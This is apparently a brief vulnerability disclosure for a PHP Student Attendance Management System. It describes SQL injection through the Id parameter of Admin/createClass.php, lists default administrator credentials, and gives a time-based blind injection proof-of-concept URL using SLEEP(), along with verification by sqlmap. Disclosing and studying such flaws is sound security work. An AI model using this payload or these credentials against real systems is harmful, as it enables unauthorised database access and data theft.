SQL injection vulnerability in Student Attendance Management System

[huclilu]

Build environment: Aapche2.4.39; MySQL5.7.26； PHP7.3.4

SQL injection vulnerability in Student Attendance Management System。input admin@mail.com / Password@123 Log in to the background. Then modify the information in createClass Php, the ID is assigned to the variable $ID, and then inserted into the database for query, and the query information is returned, causing a SQL injection vulnerability

2.sql injectionPOC：

http://127.0.0.1/Admin/createClass.php?action=edit&Id=2' AND (SELECT 5892 FROM (SELECT(SLEEP(5)))cbkc) AND 'Popu'='Popu---

• Use sqlmap to verify

• Manual verification

1. SLEEP(5)

2. SLEEP(8)